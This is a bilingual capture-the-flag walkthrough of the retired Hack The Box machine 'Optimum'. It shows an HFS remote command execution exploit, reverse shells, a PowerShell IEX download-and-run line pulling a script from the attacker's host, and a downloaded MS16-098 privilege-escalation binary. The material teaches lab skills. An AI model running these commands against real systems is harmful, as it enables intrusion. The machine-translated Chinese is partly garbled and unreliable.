打破冷漠僵局文章

Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world scenarios and some of them leaning more towards a CTF style of challenge.

Hack The Box(HTB)是一个在线平台，可让您测试渗透测试技能。 它包含一些不断更新的挑战。 其中一些模拟现实世界的场景，而另一些则更倾向于CTF的挑战风格。

Note. Only write-ups of retired HTB machines are allowed.

注意 。 只允许注销HTB机器。

Optimum is a beginner-level machine which mainly focuses on enumeration of services with known exploits. Both exploits are easy to obtain and have associated Metasploit modules, making this machine fairly simple to complete

Optimum是初学者级别的机器，主要致力于枚举具有已知漏洞的服务。 两种漏洞利用都很容易获得，并且具有关联的Metasploit模块，这使得该机器的安装相当简单

We will use the following tools to pawn the box on a Kali Linux box

我们将使用以下工具将盒子当成Kali Linux盒子

• nmap

  纳帕

• zenmap

  禅地图

• searchsploit

  searchsploit

• metasploit

  元胞

第1步-扫描网络 (Step 1 - Scanning the network)

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

开发机器之前的第一步是进行一些扫描和侦察。

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as you could.

这是最重要的部分之一，因为它将决定您以后可以尝试利用的内容。 最好在该阶段花费更多的时间以获取尽可能多的信息。

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

我将使用Nmap(网络映射器)。 Nmap是一个免费的开源实用程序，用于网络发现和安全审核。 它使用原始IP数据包来确定网络上可用的主机，这些主机提供的服务，它们正在运行的操作系统，使用的数据包过滤器/防火墙的类型以及许多其他特征。

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here

此工具可以使用许多命令来扫描网络。 如果您想了解更多信息，可以在这里查看文档

I use the following command to get a basic idea of what we are scanning

我使用以下命令来了解我们正在扫描的内容

nmap -sV -O -F --version-light 10.10.10.8

-sV: Probe open ports to determine service/version info

-sV：探测打开的端口以确定服务/版本信息

-O: Enable OS detection

-O：启用操作系统检测

-F: Fast mode - Scan fewer ports than the default scan

-F：快速模式-扫描的端口少于默认扫描

--version-light: Limit to most likely probes (intensity 2)

--version-light：限制为最可能的探测(强度2)

10.10.10.8: IP address of the Optimum box

10.10.10.8： “最佳”框的IP地址

You can also use Zenmap, which is the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.

您也可以使用Zenmap，这是官方的Nmap Security Scanner GUI。 它是一个多平台，免费和开源的应用程序，旨在使Nmap易于初学者使用，同时为经验丰富的Nmap用户提供高级功能。

I use a different set of commands to perform an intensive scan

我使用一组不同的命令来执行密集扫描

nmap -A -v 10.10.10.8

-A: Enable OS detection, version detection, script scanning, and traceroute

-A：启用操作系统检测，版本检测，脚本扫描和跟踪路由

-v: Increase verbosity level

-v：提高详细程度

10.10.10.8: IP address of the Optimum box

10.10.10.8： “最佳”框的IP地址

If you find the results a little bit too overwhelming, you can move to the Ports/Hosts tab to only get the open ports

如果发现结果有点不堪重负，则可以移至“ 端口/主机”选项卡以仅获取打开的端口

We can see that there is 1 open port:

我们可以看到有1个开放端口：

Port 80. Hypertext Transfer Protocol (HTTP). Here it's an HttpFileServer httpd 2.3

端口 80 。 超文本传输​​协议(HTTP)。 这是HttpFileServer httpd 2.3

For now, this is our main target

目前，这是我们的主要目标

第2步-访问网站 (Step 2 - Visiting the website)

Let's try the port 80 and visit http://10.10.10.8

让我们尝试端口80并访问http://10.10.10.8

We can see at the bottom of the page the server information. We have an HttpFileServer 2.3

我们可以在页面底部看到服务器信息。 我们有一个HttpFileServer 2.3

A HTTP File Server, also known as HFS, is a free web server specifically designed for publishing and sharing files.

HTTP文件服务器 ，也称为HFS，是专门设计用于发布和共享文件的免费Web服务器。

The official documentation describes HFS as:

官方文档将HFS描述为：

HFS (Http File Server) is a file sharing software which allows you to send and receive files. You can limit this sharing to just a few friends, or be open to the whole world. HFS is different from classic file sharing because there is no network. HFS is a web server which uses web technology to be more compatible with today's Internet. Since it is actually a web server, your friends can download files as if they were downloading from a website using a web browser, such as Internet Explorer or Firefox. Your users don't have to install any new software. HFS lets you share your files. Most web servers are used to publish a website, but HFS is not designed to do that. You are, however, free to use it in any way you wish, - but at your own risk.

HFS(Http文件服务器)是一种文件共享软件，可让您发送和接收文件。 您可以将此共享限制为仅几个朋友，或者向全世界开放。 HFS与经典文件共享不同，因为没有网络。 HFS是一种Web服务器，它使用Web技术与当今的Internet更加兼容。 由于它实际上是一台Web服务器，因此您的朋友可以像使用Web浏览器(例如Internet Explorer或Firefox)从网站下载文件一样下载文件。 您的用户不必安装任何新软件。 HFS使您可以共享文件。 大多数Web服务器都用于发布网站，但是HFS并非旨在这样做。 但是，您可以随意使用它，但需要您自担风险。

I use Searchsploit to check if there is any known vulnerability on HFS. Searchsploit is a command line search tool for Exploit Database

我使用Searchsploit来检查HFS上是否存在任何已知漏洞。 Searchsploit是漏洞数据库的命令行搜索工具

I use the following command

我使用以下命令

searchsploit HFS

We can see several vulnerabilities, but we will examine the Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) with this command

我们可以看到几个漏洞，但是我们将使用此命令检查Rejetto HTTP文件服务器(HFS)-远程命令执行(Metasploit)

searchsploit -x 34926.rb

We have a summary of the exploit and the code

我们对漏洞利用和代码进行了总结

In the description we can see that the

在说明中，我们可以看到

Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows XP SP3, Windows 7 SP1 and Windows 8.

由于文件ParserLib.pas中的正则表达式不正确，Rejetto HttpFileServer(HFS)容易受到远程命令执行攻击。 此模块通过使用'％00'绕过过滤来利用HFS脚本命令。 此模块已通过Windows XP SP3，Windows 7 SP1和Windows 8在HFS 2.3b上成功测试。

We can also find the exploit on the Exploit Database website

我们也可以在漏洞利用数据库网站上找到漏洞利用

As well as on the Rapid7 website

以及Rapid7网站上

We know that the version of the application is HttpFileServer 2.3

我们知道该应用程序的版本是HttpFileServer 2.3

We will use Metasploit, which is a penetration testing framework. It's an essential tool for many attackers and defenders

我们将使用Metasploit ，这是一个渗透测试框架。 对于许多攻击者和防御者来说，这是必不可少的工具

I launch Metasploit Framework on Kali and look for command I should use to launch the exploit

我在Kali上启动Metasploit框架 ，并寻找启动漏洞利用程序所需的命令

If you want to get more info on the exploit, you can use the following command

如果要获取有关漏洞利用的更多信息，可以使用以下命令

info exploit/windows/http/rejetto_hfs_exec

And you will get some detailed information on the exploit

您将获得有关漏洞利用的一些详细信息

I use the following command to use the exploit

我使用以下命令来使用漏洞利用程序

use exploit/windows/http/rejetto_hfs_exec

I need to set up several options before launching the exploit

启动漏洞之前，我需要设置几个选项

I start by setting the RHOSTS with the following command

我首先使用以下命令设置RHOSTS

set RHOSTS 10.10.10.8

and I set the SRHVOST with

然后将SRHVOST设置为

set SRHVOST 10.10.14.23

When I check the options, I get this

当我检查选项时，我得到了

I  then run the exploit with the command

然后，我使用命令运行漏洞利用程序

exploit

And I get a Meterpreter session

我得到了Meterpreter会议

From the Offensive Security website, we get this definition for Meterpreter

从“ 进攻性安全”网站上，我们获得了Meterpreter的定义

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Meterpreter是一种高级的，动态可扩展的有效负载，它使用内存中的 DLL注入暂存器，并在运行时通过网络进行了扩展。 它通过暂存器套接字进行通信，并提供全面的客户端Ruby API。 它具有命令历史记录，制表符完成，通道等功能。

You can read more about Meterpreter here.

您可以在此处阅读有关Meterpreter的更多信息。

Let's start by gathering some information

让我们开始收集一些信息

getuid returns the real user ID of the calling process and sysinfo returns certain statistics on memory and swap usage, as well as the load average

getuid返回调用过程的真实用户ID， sysinfo返回有关内存和交换使用情况以及平均负载的某些统计信息

If we look closely, we can see that Optimum’s architecture is x64, but our meterpreter version is set to x86. We will need to change this!

如果仔细观察，可以看到Optimum的体系结构是x64 ，但是我们的meterpreter版本设置为x86。 我们将需要更改此设置！

I put this session in the background with the command

我使用以下命令将此会话置于后台

background

I check the module options one more time and I see that the payload options are not correctly set up

我再次检查模块选项，发现有效载荷选项未正确设置

It is using

它正在使用

windows/meterpreter/reverse_tcp

instead of

代替

windows/x64/meterpreter/reverse_tcp

I set up the payload with the following command

我使用以下命令设置有效负载

set payload windows/x64/meterpreter/reverse_tcp

I get another meterpreter session, and when I check the sysinfo, I can see that I have the correct meterpreter version this time, x64/windows

我得到另一个meterpreter会话，当我检查sysinfo时 ，可以看到这次我具有正确的meterpreter版本， x64 / windows

步骤3-寻找user.txt标志 (Step 3 - Looking for the user.txt flag)

Now that I have a session, I can list all the files/folders with the following command

现在我有了一个会话，我可以使用以下命令列出所有文件/文件夹

ls

And I find the user flag! I can check the content of the file with

而且我找到了用户标志！ 我可以用检查文件的内容

cat user.txt.txt

I try to navigate to the Administrator folder but got an access is denied message. I need to do a privilege escalation to capture the root.txt flag

我尝试导航到Administrator文件夹，但收到拒绝访问消息。 我需要进行特权升级以捕获root.txt标志

步骤4-使用Metasploit进行权限升级 (Step 4 - Using Metasploit for privilege escalation )

I will use the module post/multi/recon/local_exploiter_suggester

我将使用模块post / multi / recon / local_exploiter_suggester

From the Rapid7 website, I get this

从Rapid7网站上，我得到了

This module suggests local meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter. It's important to note that not all local exploits will be fired. Exploits are chosen based on these conditions: session type, platform, architecture, and required default options.

该模块建议可以使用的本地计费器利用。 根据用户打开外壳的体系结构和平台以及meterpreter中的可用漏洞，建议利用漏洞。 重要的是要注意，并非所有本地漏洞都会被解雇。 根据以下条件选择漏洞利用：会话类型，平台，体系结构和所需的默认选项。

I check for the options and I list all the sessions to make sure to pick the right one

我检查选项，并列出所有会话以确保选择正确的会话

I set session 2 to point the exploit at the x64 meterpreter session

我将会话2设置为将漏洞利用指向x64 meterpreter会话

set SESSION 2

and set the description to have a detailed explanation of any suggested exploits

并设置说明以详细说明任何建议的利用

set SHOWDESCRIPTION true

I launch the exploit but nothing seems to come back

我启动了漏洞利用程序，但似乎什么也没回来

Going back to the second sessions with

回到第二届会议

sessions 2

and checking sysinfo once again gives us more information on the operating system. We can see it is a Windows 2012 R2

并再次检查sysinfo可为我们提供有关操作系统的更多信息。 我们可以看到它是Windows 2012 R2

I do a Google search to find any privilege escalation exploit on Windows 2012 R2 and find this exploit

我在Google搜索中找到Windows 2012 R2上的任何特权升级漏洞并找到了该漏洞

As well as the official Microsoft Security Bulletin on MS16-032

以及MS16-032上的官方Microsoft安全公告

Back on Metasploit, I check if there is any exploit available and I find one with

回到Metasploit，我检查是否有可用的漏洞利用程序，并且发现

search ms16-032

I check the options and set up the session

我检查选项并设置会话

set SESSION 3

the LHOST

失落的人

set LHOST 10.10.14.27

and the target to Windows x64

和目标到Windows x64

set TARGET 1

I check the options to see if everything is configured properly

我检查选项以查看是否所有配置均正确

I launch the exploit but it doesn't seem to work anymore. I will need to exploit it manually without the help of Metasploit!

我启动了该漏洞利用程序，但似乎不再起作用。 我将需要在没有Metasploit的帮助下手动利用它！

步骤5-创建一个低特权反向shell (Step 5 - Creating a low privilege reverse shell)

Back on searchsploit, I check the results from

回到searchsploit，我检查了

searchsploit HFS

I can see several vulnerabilities, but I will examine the '2.3.x - Remote Command Execution (1)' first with this command

我可以看到几个漏洞，但是我将首先使用此命令检查“ 2.3.x-远程命令执行(1)”

searchsploit -x 34668.txt

I have an explanation of the exploit

我对漏洞有一个解释

I then examine the '2.3.x - Remote Command Execution (2)' with this command

然后，我使用此命令检查“ 2.3.x-远程命令执行(2)”

searchsploit -x 39161.py

I have a summary of the exploit and the code. I then have a look at the code and the description

我对漏洞利用和代码进行了总结。 然后，我看一下代码和说明

You can use HFS (HTTP File Server) to send and receive files. It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.

您可以使用HFS(HTTP文件服务器)发送和接收文件。 它与经典文件共享不同，因为它使用Web技术与当今的Internet更加兼容。 它也不同于传统的Web服务器，因为它非常易于使用，并且可以“即开即用”地运行。 通过网络访问您的远程文件。 它已在Linux下与Wine一起成功测试。

Then at the note that explains that it depends on a web server to download and leverage nc.exe to get the reverse shell

然后在注释中说明，它依赖于Web服务器来下载并利用nc.exe来获取反向Shell。

You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe)

您需要使用托管netcat的Web服务器(http：// <attackers_ip>：80 / nc.exe)

If you check the help section of searchsploit, we can copy an exploit to the current directory

如果您查看searchsploit的帮助部分，我们可以将漏洞利用复制到当前目录

I use the following command to copy the file

我使用以下命令复制文件

searchsploit -m 39161.py

Then I use this command to modify the file

然后我用这个命令来修改文件

nano 39161.py

and change the hard coded IP address to the one of the attacking machine - my machine in this case

并将硬编码的IP地址更改为攻击机器之一-在这种情况下为我的机器

ip_addr = "10.10.14.27" #local IP address

I create a www folder

我创建一个www文件夹

and I copy nc.exe over

然后我复制nc.exe

I launch the exploit. On the first window on the top left, I launch a small python server with

我启动漏洞利用程序。 在左上方的第一个窗口中，我启动了一个小型python服务器

python -m SimpleHTTPServer 80

The SimpleHTTPServer module that comes with Python is a simple HTTP server that provides standard GET and HEAD request handlers

Python随附的SimpleHTTPServer模块是一个简单的HTTP服务器，它提供标准的GET和HEAD请求处理程序

The second window on the top right has netcat listening. I set up a Ncat listener on port 443 to catch the reverse shell connection

右上角的第二个窗口有netcat监听。 我在端口443上设置了Ncat侦听器，以捕获反向Shell连接

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users

Ncat是一个功能丰富的联网实用程序，可从命令行跨网络读取和写入数据。 Ncat是为Nmap项目编写的，是对久负盛名的Netcat的重新改进。 它同时使用TCP和UDP进行通信，并且被设计为可靠的后端工具，可以立即为其他应用程序和用户提供网络连接。

You can learn more about Ncat here

您可以在此处了解有关Ncat的更多信息

nc -nvlp 443 10.10.10.8

The third window has the python exploit - I had to launch the script twice, one to trigger nc.exe and the other to get the reverse shell

第三个窗口具有python漏洞利用程序-我不得不启动两次脚本，一个触发nc.exe ，另一个触发反向shell。

The python exploit (3rd window) will connect to the python server (1st window) to download the nc.exe Windows binary. Then nc.exe connects back to the Ncat listener on port 443 (2nd window) and will create a low privilege reverse shell

python exploit(第三个窗口)将连接到python服务器(第一个窗口)，以下载nc.exe Windows二进制文件。 然后nc.exe在端口443(第二个窗口)上连接回到Ncat侦听器，并将创建一个低特权反向外壳程序

python 39161.py 10.10.10.8 80

You can check see the user is Kostas on this machine

您可以检查用户在此计算机上是否是Kostas

C:\Users\kostas\Desktop>

I can then navigate on Kostas machine to get the user flag!

然后，我可以在Kostas机器上导航以获取用户标志！

I check who I am on the machine with the command,

我通过命令检查我在机器上的身份，

whoami

list the files/folders with

列出文件/文件夹

dir

and show the user flag content with

并显示用户标记内容

type user.txt.txt

I find the user flag! Let's get the root flag now :)

我找到了用户标志！ 现在让我们获取根标志:)

步骤 6a- 使用 GDSSecurity / Windows-Exploit-Suggester (Step 6a - Using GDSSecurity/Windows-Exploit-Suggester)

I show the system information with

我用显示系统信息

systeminfo

I copy/paste the findings on a systeminfo.txt file

我将调查结果复制/粘贴到systeminfo.txt文件中

I will use Windows-Exploit-Suggester from GDSSecurity

我将使用GDSSecurity的 Windows-Exploit-Suggester

This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

此工具将目标补丁程序级别与Microsoft漏洞数据库进行比较，以检测目标上可能缺少的补丁程序。 它还会通知用户是否有可用于丢失公告的公用漏洞利用程序和Metasploit模块。

It requires the 'systeminfo' command output from a Windows host in order to compare that the Microsoft security bulletin database and determine the patch level of the host.

它需要Windows主机的“ systeminfo”命令输出，以便比较Microsoft安全公告数据库并确定主机的补丁程序级别。

It has the ability to automatically download the security bulletin database from Microsoft with the --update flag, and saves it as an Excel spreadsheet.

它具有使用--update标志从Microsoft自动下载安全公告数据库的功能，并将其另存为Excel电子表格。

I copy/paste the raw windows-exploit-suggester python script on a file and then modify the file

我将原始的windows-exploit-suggester python脚本复制/粘贴到文件上，然后修改该文件

nano windows-exploit-suggester.py

to paste the code from the GitHub repository. We now have our 2 files into the same folder, systeminfo.txt and windows-exploit-suggester.py

从GitHub仓库粘贴代码。 现在，我们将2个文件放入相同的文件夹中，即systeminfo.txt和Windows-exploit-suggester.py

I can find out more about this tool with the following command

我可以使用以下命令找到有关此工具的更多信息

python windows-exploit-suggester.py -h

I update the database of the tool with the following command

我使用以下命令更新该工具的数据库

python windows-exploit-suggester.py --update

I run the script with

我运行脚本

python windows-exploit-suggester.py --systeminfo systeminfo.txt --database 2019-10-08-mssb.xls

I can see that there are several missing CVEs on this machine. I will target the MS16-032 vulnerability

我可以看到这台计算机上缺少几个CVE。 我将针对MS16-032漏洞

步骤6b-使用Sherlock枚举KB (Step 6b - Using Sherlock to enumerate KBs)

I will use Sherlock to enumerate the KB on this machine. Sherlock is a PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

我将使用Sherlock枚举此计算机上的KB。 Sherlock是一个PowerShell脚本，可以快速找到缺少的本地补丁程序升级漏洞的软件补丁。

You can learn more on Sherlock here

您可以在这里了解更多关于夏洛克的信息

When I ran the sysinfo command in Step 6a, I could see a list of KBs. KB stands for Knowledge Base. Microsfot defines it as

当我在步骤6a中运行sysinfo命令时，我可以看到KB列表。 KB代表知识库。 Microsfot将其定义为

The Microsoft Knowledge Base has more than 150,000 articles. These articles were created by thousands of support professionals who have resolved issues for our customers. The Microsoft Knowledge Base is regularly updated, expanded, and refined to help make sure that you have access to the very latest information.

Microsoft知识库中有超过150,000篇文章。 这些文章是由成千上万的支持专业人员创建的，他们为我们的客户解决了问题。 Microsoft知识库会定期更新，扩展和完善，以确保您可以访问最新信息。

You can learn more on KB here

您可以在此处了解有关KB的更多信息

I git clone the Sherlock repository to my local and move it to the www/ folder

我将Sherlock储存库克隆到本地，然后将其移动到www /文件夹

I change the file Sherlock.ps1 and add Find-Allvulns at the end of the Powershell script with

我更改文件Sherlock.ps1并在Powershell脚本的末尾添加Find-Allvulns

nano Sherlock.ps1

I then use the following command

然后，我使用以下命令

wget "http://10.10.14.27//sherlock/Sherlock.ps1"

to fetch the file from Kostas' machine

从Kostas的计算机中获取文件

I then launch Sherlock with the following command

然后，使用以下命令启动Sherlock。

IEX(New-Object Net.Webclient).downloadString('http://10.10.14.27/sherlock/Sherlock.ps1')

It will go through all the KB

它将遍历所有KB

and returns with which ones are vulnerable

以及那些易受伤害的人的回报

步骤7-使用RGNOBJ整数溢出进行特权升级 (Step 7 - Using RGNOBJ Integer Overflow for privilege escalation)

At Step 6a, when I got the result back from the Windows Exploit Suggester, one of the exploit targets Windows 8.1 (x64)

在步骤6a中 ，当我从Windows漏洞利用建议程序获得结果时，其中一个漏洞利用目标是Windows 8.1(x64)

If we have a look at the Microsoft documentation, we can see that Windows Server 2012 R2 is related to Windows 8.1 and has the same build number. We can assume the exploit might work as well on it

如果我们查看Microsoft文档，就会发现Windows Server 2012 R2与Windows 8.1相关，并且具有相同的内部版本号。 我们可以假设该漏洞利用程序也可以正常工作

I look on searchsploit

我看着searchsploit

searchsploit m16-098

I can also find it on the Exploit Database website

我也可以在漏洞利用数据库网站上找到它

I use the following command to copy the file

我使用以下命令复制文件

searchsploit -m 41020.c

The exploit needs to be compiled before it can be executed. I check the code with

该漏洞需要先编译才能执行。 我检查代码

cat 41020.c

I can see in the comments that the exploit has a pre-compiled Windows binary available that can be used

我可以在评论中看到该漏洞利用程序具有可用的预编译的Windows二进制文件

I copy the exploit with the wget command and move the file to my www folder

我使用wget命令复制漏洞利用并将文件移动到我的www文件夹中

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

I set up another python server - I kill the previous one.

我设置了另一个python服务器-我杀死了前一个。

python -m SimpleHTTPServer 80

On the other window, on Kostas machine I use powershell to download the exploit

在另一个窗口上，在Kostas机器上，我使用powershell下载漏洞利用程序

powershell wget "http://10.10.14.27/41020.exe" -outfile "exploit.exe"

I then execute the exploit with

然后，我使用

exploit.exe

I can see that the privilege escalation was a success by checking who I am on the machine

通过检查我在计算机上的身份，我可以看到特权升级成功

whoami

It returns

它返回

nt authority\system

I am admin

我是管理员

Let's find the root flag now! I navigate up to Users and check in to the Administrator/Desktop folder. I find the flag!

让我们现在找到根标志！ 我向上导航至“用户”并签入“管理员/桌面”文件夹。 我找到了旗帜！

I use the following command to see the content of the file

我使用以下命令查看文件内容

type root.txt

Congrats! You found both flags!

恭喜！ 您找到了两个标志！

---

---

Please don’t hesitate to comment, ask questions or share with your friends :)

请不要犹豫，发表评论，提问或与您的朋友分享:)

You can see more of my articles here

您可以在这里看到更多我的文章

You can follow me on Twitter or on LinkedIn

您可以在Twitter或LinkedIn上关注我

And don't forget to #GetSecure, #BeSecure & #StaySecure!

并且不要忘记＃ GetSecure ，＃ BeSecure和＃StaySecure ！

---

---

Other Hack The Box articles

其他Hack The Box文章

• Keep Calm and Hack The Box - Lame

  保持冷静并砍箱子-me脚

• Keep Calm and Hack The Box - Legacy

  保持冷静并打破常规-旧版

• Keep Calm and Hack The Box - Devel

  保持冷静并打破僵局-开发

• Keep Calm and Hack The Box - Beep

  保持冷静并砍箱子-哔

翻译自: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-optimum/

打破冷漠僵局文章